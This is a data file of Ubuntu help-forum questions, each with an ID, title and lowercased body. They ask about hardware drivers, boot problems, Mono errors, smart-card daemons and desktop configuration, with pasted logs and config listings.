254264	touchpad not working on inspiron 6000	got a problem with my touchpad since i upgraded to 12.04 : it 's working but i cant do nothing with it : very imprecise and very slow . try to handle the touchpad config in settings but no results ... the problem is the same with or without usb mouse plugged in . well this is not a big issue since the mouse is working properly ( even its a very recent microsoft model ) , but well i would be happy to have a portable entire portable ^^ xinput in terminal returns : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft comfort mouse 6000 id=9 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=11 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ video bus id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ( see the microsoft deluxe mouse ) and i guess alpsps2 is the touchpad ? xserver-xorg-input-synaptics is installed and uptodate . sys spec : dell inspiron 6000 , ubuntu 12.04 lts , 32 bit
254265	lubuntu 12.04 wireless not working	i am using an lubuntu 12.04 with a lenovo thinkpad laptop . everything works fine except the wireless connection does n't work . if i plug the cable in it works right away but i ca n't get the wireless to connect . i have the network manager open , and it detects the networks around , but when i click a given network , one without a password , the tray icon for the network manager just display an arrow going continuously in circles forever . it 's like the wireless is working but that there is just some tiny thing somewhere blocking . and i get no error or anything . what can i do to get the wireless working ?
254267	mono : could n't bind to method 'sethostingenvironment	i 've migrated an mvc3 site to linux using monodevelop . i 'm currently able to compile my code , however , when i try to run/debug i get this error could n't bind to method 'sethostingenvironment ' . here 's a full stack trace . adding applications '/ : . ' ... registering application : host : any port : any virtual path : / physical path : /home/trx/downloads/trx.crm.dashboard.web.ui - copy/trx.crm.dashboard.web.ui/ handling exception type targetinvocationexception message is exception has been thrown by the target of an invocation . isterminating is set to true system.reflection.targetinvocationexception : exception has been thrown by the target of an invocation . server stack trace : at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in :0 at system.reflection.methodbase.invoke ( system.object obj , system.object [ ] parameters ) [ 0x00000 ] in :0 at system.runtime.serialization.objectrecord.loaddata ( system.runtime.serialization.objectmanager manager , isurrogateselector selector , streamingcontext context ) [ 0x00000 ] in :0 at system.runtime.serialization.objectmanager.dofixups ( ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.objectreader.readnextobject ( system.io.binaryreader reader ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.objectreader.readobjectgraph ( binaryelement elem , system.io.binaryreader reader , boolean readheaders , system.object & result , system.runtime.remoting.messaging.header [ ] & headers ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.binaryformatter.nocheckdeserialize ( system.io.stream serializationstream , system.runtime.remoting.messaging.headerhandler handler ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.binaryformatter.deserialize ( system.io.stream serializationstream ) [ 0x00000 ] in :0 at system.runtime.remoting.remotingservices.deserializecalldata ( system.byte [ ] array ) [ 0x00000 ] in :0 at ( wrapper xdomain-dispatch ) system.appdomain : docallback ( object , byte [ ] & , byte [ ] & ) exception rethrown at [ 0 ] : -- - > system.argumentexception : could n't bind to method 'sethostingenvironment ' . at system.delegate.getcandidatemethod ( system.type type , system.type target , system.string method , bindingflags bflags , boolean ignorecase , boolean throwonbindfailure ) [ 0x00000 ] in :0 at system.delegate.createdelegate ( system.type type , system.type target , system.string method , boolean ignorecase , boolean throwonbindfailure ) [ 0x00000 ] in :0 at system.delegate.createdelegate ( system.type type , system.type target , system.string method ) [ 0x00000 ] in :0 at system.delegateserializationholder+delegateentry.deserializedelegate ( system.runtime.serialization.serializationinfo info ) [ 0x00000 ] in :0 at system.delegateserializationholder..ctor ( system.runtime.serialization.serializationinfo info , streamingcontext ctx ) [ 0x00000 ] in :0 at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( system.reflection.monocmethod , object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in :0 -- - end of inner exception stack trace -- - at ( wrapper xdomain-invoke ) system.appdomain : docallback ( system.crossappdomaindelegate ) at ( wrapper remoting-invoke-with-check ) system.appdomain : docallback ( system.crossappdomaindelegate ) at system.web.hosting.applicationhost.createapplicationhost ( system.type hosttype , system.string virtualdir , system.string physicaldir ) [ 0x00000 ] in :0 at mono.webserver.vpathtohost.createhost ( mono.webserver.applicationserver server , mono.webserver.websource websource ) [ 0x00000 ] in :0 at mono.webserver.xsp.server.realmain ( system.string [ ] args , boolean root , iapplicationhost ext_apphost , boolean quiet ) [ 0x00000 ] in :0 at mono.webserver.xsp.server.main ( system.string [ ] args ) [ 0x00000 ] in :0 [ error ] fatal unhandled exception : system.reflection.targetinvocationexception : exception has been thrown by the target of an invocation . server stack trace : at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in :0 at system.reflection.methodbase.invoke ( system.object obj , system.object [ ] parameters ) [ 0x00000 ] in :0 at system.runtime.serialization.objectrecord.loaddata ( system.runtime.serialization.objectmanager manager , isurrogateselector selector , streamingcontext context ) [ 0x00000 ] in :0 at system.runtime.serialization.objectmanager.dofixups ( ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.objectreader.readnextobject ( system.io.binaryreader reader ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.objectreader.readobjectgraph ( binaryelement elem , system.io.binaryreader reader , boolean readheaders , system.object & result , system.runtime.remoting.messaging.header [ ] & headers ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.binaryformatter.nocheckdeserialize ( system.io.stream serializationstream , system.runtime.remoting.messaging.headerhandler handler ) [ 0x00000 ] in :0 at system.runtime.serialization.formatters.binary.binaryformatter.deserialize ( system.io.stream serializationstream ) [ 0x00000 ] in :0 at system.runtime.remoting.remotingservices.deserializecalldata ( system.byte [ ] array ) [ 0x00000 ] in :0 at ( wrapper xdomain-dispatch ) system.appdomain : docallback ( object , byte [ ] & , byte [ ] & ) exception rethrown at [ 0 ] : -- - > system.argumentexception : could n't bind to method 'sethostingenvironment ' . at system.delegate.getcandidatemethod ( system.type type , system.type target , system.string method , bindingflags bflags , boolean ignorecase , boolean throwonbindfailure ) [ 0x00000 ] in :0 at system.delegate.createdelegate ( system.type type , system.type target , system.string method , boolean ignorecase , boolean throwonbindfailure ) [ 0x00000 ] in :0 at system.delegate.createdelegate ( system.type type , system.type target , system.string method ) [ 0x00000 ] in :0 at system.delegateserializationholder+delegateentry.deserializedelegate ( system.runtime.serialization.serializationinfo info ) [ 0x00000 ] in :0 at system.delegateserializationholder..ctor ( system.runtime.serialization.serializationinfo info , streamingcontext ctx ) [ 0x00000 ] in :0 at ( wrapper managed-to-native ) system.reflection.monocmethod : internalinvoke ( system.reflection.monocmethod , object , object [ ] , system.exception & ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in :0 -- - end of inner exception stack trace -- - at ( wrapper xdomain-invoke ) system.appdomain : docallback ( system.crossappdomaindelegate ) at ( wrapper remoting-invoke-with-check ) system.appdomain : docallback ( system.crossappdomaindelegate ) at system.web.hosting.applicationhost.createapplicationhost ( system.type hosttype , system.string virtualdir , system.string physicaldir ) [ 0x00000 ] in :0 at mono.webserver.vpathtohost.createhost ( mono.webserver.applicationserver server , mono.webserver.websource websource ) [ 0x00000 ] in :0 at mono.webserver.xsp.server.realmain ( system.string [ ] args , boolean root , iapplicationhost ext_apphost , boolean quiet ) [ 0x00000 ] in :0 at mono.webserver.xsp.server.main ( system.string [ ] args ) [ 0x00000 ] in :0 has anyone seen this same error ? there 's another post here with the same error . however : i 'm not sure if he means he had duplicates or i should be removing all system.web . * files from my bin folder ( that seems ... dangerous ) any help on this would be awesome , and if there 's any more information i should be providing do n't hesitate to ask . i 've tried removing all those .dll 's from my bin with no success . no duplicate .dlls either .
254268	ubuntu battery/ac management	i would like to know if having the ac plugged continues to charge the battery while being 100 % . i do n't want my battery to wear out , and i do n't want to have to remove it every time i plug the ac in . is this possible in ubuntu 12.10 ?
254274	stopping calls to ubuntu music search api	how can i stop my ubuntu machine from making calls to the ubuntu music search api ( http : //alkes.canonical.com/ ) ?
254275	ubuntu 12.10 get mac like icon launcher	anyway to get this in the simplest way ? i do not want a full redo of my ubuntu theme , i just want the icon launcher like , any ideas ?
254276	time out in ubuntu	when i switch on my computer , my computer goes black for ten seconds and starts to boot . this happens because , i tweaked in start up and session to time-out for 10 seconds.but when i tried to change time out to 0 second , i does not happen and be in same time-out 10 seconds . can i change the time-out seconds to null through command ? is there any other way to change time-out seconds ?
254279	streaming to ustream via desktop	is there a software program ( preferably professional studio software ) which can stream to ustream via rtmp ?
254280	is it possible to install nvidia 310 drivers version on ubuntu 10.04 ?	i have just installed ubuntu 10.04 and want to install lastest nvidia drivers on it too .
254282	failure to connect to archive.ubuntu.com	my computer can not download anything via ubuntu software center because it fails to connect to archive.ubuntu.com . i happen to have figured out the problem . it tries to use proxy to connect to internet , how do i stop this ?
254291	edimax ps-1210 mfn & hp photosmart c4180 scanning problem	i have successfully installed a hp photosmart c4180 using an edimax print server ( ps-1210mfn ) in ubuntu 12.04 via the cups configuration.the printer is working perfectly with print server on ubuntu , but the scanner is not discoverable by xsane or ubuntu 's simple scan program.do you know what can i do in order to make work under ubuntu ?
254297	can not find operating system	i can not install ubuntu on my dell computer which has windows me installed . the copy works on my hp pc which has windows xp installed . when i try to install it in my dell machine , it tells me that it can not find an operating system and asks me to clean my hard drive . how do i install or make a live boot ?
254298	ca n't get iconify ( ) and deiconify ( ) to work properly	i 'm writing app for ubuntu with c++ and gtkmm . in my app i use libappindicator to show icon with simple menu in notification area . icon and menu works ok , i can minimize window to panel ( using iconify ( ) method ) with user action on popup menu , but deiconify ( ) method not working , window stays minimized on panel . the only way to restore window is to activate it manually clicking on panel icon . here is some code : class cmainwindow : public gtk : :window { ... glib : :refptr < gtk : :stylecontext > m_rstyle ; glib : :refptr < gtk : :uimanager > m_ruimanager ; glib : :refptr < gtk : :actiongroup > m_ractiongroup ; ... public : ... void trayinit ( ) ; void traywinshow ( ) ; void traywinexit ( ) ; ... } ; // this method is called from cmainwindow constructor void cmainwindow : :trayinit ( ) { m_ractiongroup = gtk : :actiongroup : :create ( ) ; m_ractiongroup- > add ( gtk : :action : :create ( `` show '' , `` show '' ) , sigc : :mem_fun ( *this , & cmainwindow : :traywinshow ) ) ; m_ractiongroup- > add ( gtk : :action : :create ( `` hide '' , `` hide '' ) , sigc : :mem_fun ( *this , & cmainwindow : :traywinhide ) ) ; m_ruimanager = gtk : :uimanager : :create ( ) ; m_ruimanager- > insert_action_group ( m_ractiongroup ) ; add_accel_group ( m_ruimanager- > get_accel_group ( ) ) ; glib : :ustring strui = `` < ui > '' `` < popup name='indicatorpopup ' > '' `` < menuitem action='show ' / > '' `` < menuitem action='hide ' / > '' `` < /popup > '' `` < /ui > '' ; m_ruimanager- > add_ui_from_string ( strui ) ; gtk : :widget *pwidget ; pwidget = m_ruimanager- > get_widget ( `` /ui/indicatorpopup '' ) ; m_pappicon = app_indicator_new ( `` sample '' , `` sample_icon '' , app_indicator_category_application_status ) ; app_indicator_set_status ( m_pappicon , app_indicator_status_active ) ; app_indicator_set_menu ( m_pappicon , gtk_menu ( pwidget- > gobj ( ) ) ) ; } void cmainwindow : :traywinshow ( ) { deiconify ( ) ; } void cmainwindow : :traywinhide ( ) { iconify ( ) ; } also i tried to use hide ( ) /show ( ) methods : void cmainwindow : :traywinshow ( ) { show ( ) ; get_application ( ) - > release ( ) ; } void cmainwindow : :traywinhide ( ) { get_application ( ) - > hold ( ) ; hide ( ) ; } this variant properly hides window but when it calls show ( ) i get a segfault . can anyone point me to what i 'm doing wrong ?
254300	ca n't get `pcscd` to start in ubuntu 12.10	i 'm trying to get a smart card reader ( scr3310 ) to work under ubuntu 12.10 . i have used this same card reader with linux mint and previous versions of ubuntu . i have installed pcsc-tools , pcscd libccid , libnss3-tools , and coolkey . the driver for the card reader is included in libccid . when i run pcsc_scan the terminal returns the error , scardestablishcontext : service not available . if i understand this correctly , the error is indicating that it ca n't contact the pcscddaemon/service . when i check service pcscd status it returns * pcscd is not running . if i try sudo service pcscd start , i get no error but the service does n't start . i also tried the force-reload option , it returns * restarting pcsc lite resource manager pcscd [ failed ] for what it 's worth , the card reader and supporting software currently work under my mint partition . so far i have n't seen where i 'm missing anything under the ubuntu install that is present under mint . also , i have tried un-installing/re-installing pcscd . is it likely that there is another service that pcscd depends on that may not be present ? operating system : ubuntu 12.10 32-bit system : dell latitude e6500 card reader : scr 3310
254301	unable to disable screen saver	i have set 'turn screen off ' to never in brightness and lock , but my screen still goes dark after some time being idle , unless i 'm watching a movie in vlc or some other media player . what can i do to make it so my screen never goes dark regardless of whether the computer is idle or not ?
254305	what is my cpu temperature	to get my cpu temperatures i first typed sudo sensors-detect and confirmed everything with yes . then i typed sudo service module-init-tools restart now this is the output of sudo sensors , but which is my cpu temperature ? ( and what are the other temperatures ? ) . there are no onboard or pcie graphic cards built-in . under full load : it8720-isa-0228 adapter : isa adapter fan1 : 1461 rpm ( min = 0 rpm ) fan2 : 0 rpm ( min = 0 rpm ) fan3 : 2250 rpm ( min = 0 rpm ) fan5 : 2295 rpm ( min = 0 rpm ) temp1 : +28.0 c ( low = +127.0 c , high = +127.0 c ) sensor = thermistor temp2 : +44.0 c ( low = +127.0 c , high = +127.0 c ) sensor = thermal diode temp3 : +60.0 c ( low = +127.0 c , high = +127.0 c ) sensor = thermal diode intrusion0 : alarm k10temp-pci-00c3 adapter : pci adapter temp1 : +48.4 c ( high = +70.0 c ) ( crit = +90.0 c , hyst = +87.0 c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 124.33 w ( crit = 125.19 w ) idle : fan1 : 722 rpm ( min = 0 rpm ) fan2 : 0 rpm ( min = 0 rpm ) fan3 : 2280 rpm ( min = 0 rpm ) fan5 : 2319 rpm ( min = 0 rpm ) temp1 : +27.0 c ( low = +127.0 c , high = +127.0 c ) sensor = thermistor temp2 : +21.0 c ( low = +127.0 c , high = +127.0 c ) sensor = thermal diode temp3 : +19.0 c ( low = +127.0 c , high = +127.0 c ) sensor = thermal diode intrusion0 : alarm k10temp-pci-00c3 adapter : pci adapter temp1 : +7.4 c ( high = +70.0 c ) ( crit = +90.0 c , hyst = +87.0 c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 29.64 w ( crit = 125.19 w ) cpu : amd fx 8350 mainboard : gigabyte ga-970a-ud3
254306	how to `` nc '' data to socket file ?	i have a server listening on a socket file /tmp/any.sock and i want to write something to that socket . if it would be listening on a port , i would use echo mymessage | nc localhost 1234 , but nc /tmp/any.sock or echo mymessage > /tmp/any.sockdoes not work .
254314	does uefi support mean wubi will now work on laptops shipped with windows 8 ?	according to this news , there is an official fix for secure boot . will ubuntu adapt it ? if so , how long should it take ? and does it allow booting new computers from wubi ?
254317	how can i put games on a usb stick for a lan party ?	soon , i 'll be attending a lan party . there will be a couple of laptops , of which some have windows 7 installed , and some ubuntu 12.04 . none of these laptops are connected to the internet . i want to play 0 a.d. there . to get these games installed on the windows laptops , i 'll give my friends a usb stick with the .exe for the latest version of 0 a.d . i 'd like to be able to install 0 a.d. on the ubuntu laptops , too . however , the current version of 0 a.d. is only installable via a ppa , and i 'm not sure about how to put this ppa on a usb stick . i 'm also not sure about how possible dependencies can be resolved over there . so , how can i install 0 a.d. on a ubuntu 12.04 laptop that is n't connected to the internet ?
254318	how to upgrade ruby software to ruby 1.9.3-p385 using sudo ?	i had installed it using sudo apt-get install ruby1.9.3 . i am using ruby 1.9.3p194 ( 2012-04-20 revision 35410 ) [ x86_64-linux ] in my laptop . now i want to upgrade it more latest version ruby 1.9.3-p385 . one of my confusion is why the latest version is not getting installed , with the above command ? is ruby ruby 1.9.3-p385 not compatible with ubuntu 12.10 version ? how to do that using sudo , except rvm ?
254322	ubuntu 12.10 64bit is not shown on win7 pc in boot menu .	i have tried easybcd but it did n't worked for me . i am trying for a dual boot menu . i am installing with a bootable usb
254325	why does ubuntu downloads apps from 93.184.215.223 ?	does anyone know i why my ubuntu machine makes a connection to 93.184.215.223 when i use apt-get ? i thought all the software repositories were at *.canonical.com . i have n't added any 3rd party repositories ... ... .
254327	ubuntu says 13.04 but lsb_release says 12.10	during investigations on my samsung new series 9 with 12.10 installed on it , i found this : settings > details > ubuntu 13.04 lsb_release > ubuntu 12.10 is that possible ? i really think my printing problem is related to this inconsistency ... thank you . [ edit ] root @ jocelyne-ss9 : /home/jocelyne # cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //fr.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //fr.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal universe deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //fr.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //fr.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main deb http : //www.duinsoft.nl/pkg debs all root @ jocelyne-ss9 : /home/jocelyne # for x in /etc/apt/sources.list.d/* ; do echo ; echo ; echo `` ** $ x : '' ; echo ; cat $ x ; done ** /etc/apt/sources.list.d/gnome3-team-gnome3-quantal.list : deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu quantal main deb-src http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu quantal main ** /etc/apt/sources.list.d/gnome3-team-gnome3-quantal.list.save : deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu quantal main deb-src http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu quantal main ** /etc/apt/sources.list.d/google-chrome.list : # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main ** /etc/apt/sources.list.d/google-chrome.list.save : # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main ** /etc/apt/sources.list.d/google-talkplugin.list : # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/talkplugin/deb/ stable main ** /etc/apt/sources.list.d/google-talkplugin.list.save : # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/talkplugin/deb/ stable main ** /etc/apt/sources.list.d/jitsi.list : # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //download.jitsi.org/deb unstable/ ** /etc/apt/sources.list.d/jitsi.list.save : # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //download.jitsi.org/deb unstable/ ** /etc/apt/sources.list.d/langdalepl-gvfs-mtp-quantal.list : deb http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu quantal main deb-src http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu quantal main ** /etc/apt/sources.list.d/scopes-packagers-ppa-quantal.list : deb http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu quantal main deb-src http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu quantal main ** /etc/apt/sources.list.d/scopes-packagers-ppa-quantal.list.save : deb http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu quantal main deb-src http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu quantal main ** /etc/apt/sources.list.d/ubuntu-extras.list : # deb http : //extras.ubuntu.com/ubuntu/ quantal main # added by software-center # deb-src http : //extras.ubuntu.com/ubuntu/ quantal main # added by software-center ** /etc/apt/sources.list.d/ubuntu-extras.list.save : # deb http : //extras.ubuntu.com/ubuntu/ quantal main # added by software-center # deb-src http : //extras.ubuntu.com/ubuntu/ quantal main # added by software-center ** /etc/apt/sources.list.d/umang-indicator-stickynotes-quantal.list : deb http : //ppa.launchpad.net/umang/indicator-stickynotes/ubuntu quantal main deb-src http : //ppa.launchpad.net/umang/indicator-stickynotes/ubuntu quantal main ** /etc/apt/sources.list.d/umang-indicator-stickynotes-quantal.list.save : deb http : //ppa.launchpad.net/umang/indicator-stickynotes/ubuntu quantal main deb-src http : //ppa.launchpad.net/umang/indicator-stickynotes/ubuntu quantal main root @ jocelyne-ss9 : /home/jocelyne # apt-cache policy gnome-control-center gnome-control-center : installé : 1:3.6.3-0ubuntu11~ubuntu12.10.1 candidat : 1:3.6.3-0ubuntu11~ubuntu12.10.1 table de version : *** 1:3.6.3-0ubuntu11~ubuntu12.10.1 0 500 http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/ quantal/main amd64 packages 100 /var/lib/dpkg/status 1:3.4.2-0ubuntu19 0 500 http : //fr.archive.ubuntu.com/ubuntu/ quantal/main amd64 packages
254333	how to launch android emulator in ubuntu 12.10 ?	i downloaded android-sdk-linux and copied it to my local drive and extracted it . now , when i try to create an emulator in avd manager and launch the emulator , it does not launch . it requires an environment variable of platforms and platforms-tools directory which is in android-sdk-linux . how i can create an environment variable of these two dir in ubuntu ?
254337	forcing powermizer to maximum performance by default	i bought an xfx geforce n640 video card and installed it with driver 313.18 in my ubuntu 12.04 64 bits . the tearing level on my screen is bad , and in another question here ( how do i stop video tearing ? ( nvidia prop driver , non-compositing window manager ) ) a guy recommends changing the powermizer setting to maximum performance . the problem is that nvidia settings do n't remember my choice and return to adaptive every time . so , how can i fix this via command line in xorg ? thanks !
254339	am i using ide or ahci ?	i recently installed an ssd in my laptop , but according to what i 've read ahci mode is preferable to ide mode for sata drives , something that is set in the computer 's bios . however , i do n't have any such option in my bios . is there a way to check which sata mode i am using from inside the os ? i own a sony vaio s13 running ubuntu 12.04.1 .
254348	nvidia graphics shows as unknown	i install the nnvidia 313 drivers . everything works fine but the graphic driver is listed as unknown . in the nvidia app , nvidia server settings it 's says the correct version.. the desktop seems to be running in 3d , not sure how to verify that but the experience is set to `` standard '' what should i do here for ubuntu to list the correct driver ?
254349	why does unity depend on gnome	in the light of some similar questions i have received , i took the liberty of creating a simple question that addresses this which are : why does unity depend on gnome and to what point is the dependency required ? why is a specific version of gnome used for a specific version of ubuntu ( let 's say gnome 3.6 for ubuntu 12.10 ) what changes is unity doing in regards of being less dependent of gnome has the dependency on gnome created limitations with unity ?
254351	grub loads after refind	i have a dual-boot uefi laptop , with ubuntu and windows . i installed refind to boot to these systems , and it worked fine , but my linux system was triplicated . i supposed it was because of refind searching for any vmlinuz and all these , so i added the line scan_all_linux_kernels 0 into refind.conf . after this , the extra booting options disappeared , but when i select ubuntu , i get the grub menu to select it again . i want to disable grub , so that the system boots from refind . i have tried to apt-get remove all grub and grub2 packages , but grub still appears .
254353	how to set netbeans 7.2 as my default php ide on ubuntu 12.10	i 'm using ubuntu 12.10 64 bit ... i have installed xampp and netbeans 7.2 ide . the problem is i ca n't open any php file using netbeans ide and when i click `` open with '' i ca n't find netbeans within the displayed app how to set netbeans 7.2 as my default php files ide ?
254359	dualboot installation	i am very disappointed with the installation process , this is the fifth day i 'm tryna install ubuntu 12.10 together with windows 7 ... i have only one partition on my hard drive , i boot in ubuntu with my pendrive ( work fine ) , i selected to install together with windows 7 , and made the partition more or less in the middle , the installation went well , and asked to restart . i did .. but nothing happened , i took a look at the priorities of the bios , ubuntu is not listed , and my hd was partitioned ... what 's happening ? thank .
254362	how can i install 12.10 on a sony vaio ultrabook ( windows 8 )	i have a sony vaio ultrabook with an intel i3 64 bit running windows 8 . i booted into ubuntu via usb and then tried to install and got this message each time : sorry , ubuntu 12.10 has experienced an internal error then the screen goes black and i have to turn off via power button . the `` try it out '' function works just fine it just will not install .
254363	lightdm not loading in 12.04 in virtualbox	the boot process just stops here ( below ) . i 've tried stopping/starting lightdm but it does n't even stop nor can i pkill it . i 've already ensured that my bios has visualization enabled and have most of the boxes checking in the settings page of virtualbox . i 've run update , upgrade , and dist-upgrade and tried dpkg-reconfigure lightdm ( no output is displayed at all ) . this is a fresh install using the alternate amd64 ubuntu cd iso . i noticed that it says stopping system v initialization compatibility but not sure if that is good or bad . also , if it 's relevant , i have an ati card . edit : unable to open display in any way and sudo shutdown now fails . tty7 : lightdm log after boot : lightdm log after service restart :
254364	no unity/compiz after boot - gtk problem ?	asus zenbook prime , ubuntu 12.10 using double boot with windows 7 . while working in ubuntu , suddenly file icons did n't display properly anymore ( all icons where the same white page ) and desktop turned to blue , though everything else still worked . best i can reconstruct this happened when i downloaded some software updates ( gloobus-preview , weather icon , and one other ) - and the install did n't work with ubuntu complaining about a segmentation fault . i restarted computer and now after logging in to ubuntu - which looks mostly normal , though the icons in the notification area do n't show properly - i get a blue screen , no unity , desktop icons , or notification area . i can get to a terminal using ctrl+alt+t , but i ca n't type into it . i 've restarted multiple times with same result . everything works fine both using the windows 7 boot and booting ubuntu from a usb stick . i can get to command-line login and then to regular command line using advanced ubuntu options in the grub loader i can get to recovery and regular boot for current and prior kernels . none of the older kernels work & i could n't make much sense of the recovery options , though would be happy to add any debug that 's useful . i did run through the package repair which complained of a broken gloobus-preview . in removed gloobus-preview using sudo apt-get remove in the command line - did n't check anything after reboot . i read through this : my ubuntu 12.10 does not startup to gui but most answers do n't seem to apply as the zenbook has a generic intel graphics card that has never been a problem before . would be grateful for any suggestions ! update : so i 've been able to type into the terminal and tried starting some programs - this is kind of randomly for apturl , but it looks very similar for unity and compiz ( with dozens of the unrecognized image file format issues preceding it ) . so this looks like a gtk problem ? any thoughts on how to fix this ? ( apturl-gtk:417 ) : gtk-warning ** : theme parsing error : unity.css:32:51 : unrecognized image file format ( apturl-gtk:417 ) : gtk-warning ** : unknown property : gtkdialog.has-separator traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apturl/apturl.py '' , line 142 , in parseargs apturl_list = parser.parse ( args [ 0 ] ) indexerror : list index out of range during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/bin/apturl-gtk '' , line 47 , in < module > sys.exit ( apturl.main ( ) ) file `` /usr/lib/python3/dist-packages/apturl/apturl.py '' , line 169 , in main apturl_list = self.parseargs ( ) file `` /usr/lib/python3/dist-packages/apturl/apturl.py '' , line 144 , in parseargs self.ui.error ( _ ( `` need a url to continue , exiting '' ) ) file `` /usr/lib/python3/dist-packages/apturl/gtk/gtkui.py '' , line 59 , in error d = self._get_dialog ( gtk.messagetype.error , summary , msg ) file `` /usr/lib/python3/dist-packages/apturl/gtk/gtkui.py '' , line 52 , in _get_dialog d.set_icon ( gtk.icontheme.get_default ( ) .load_icon ( 'deb ' , 16 , false ) ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 47 , in function return info.invoke ( *args , **kwargs ) gi._glib.gerror : icon 'deb ' not present in theme
254367	permanently fix chrome scroll speed	so , i am changing the scroll speed in ubuntu using this answer : change mouse wheel scroll speed in chrome on 12.04 ( edit starter bar commandline ) exec=/opt/google/chrome/google-chrome -- scroll-pixels=150 % u it works , but every time chrome updates i need to do it again , is there any way i can permanently fix this issue ?
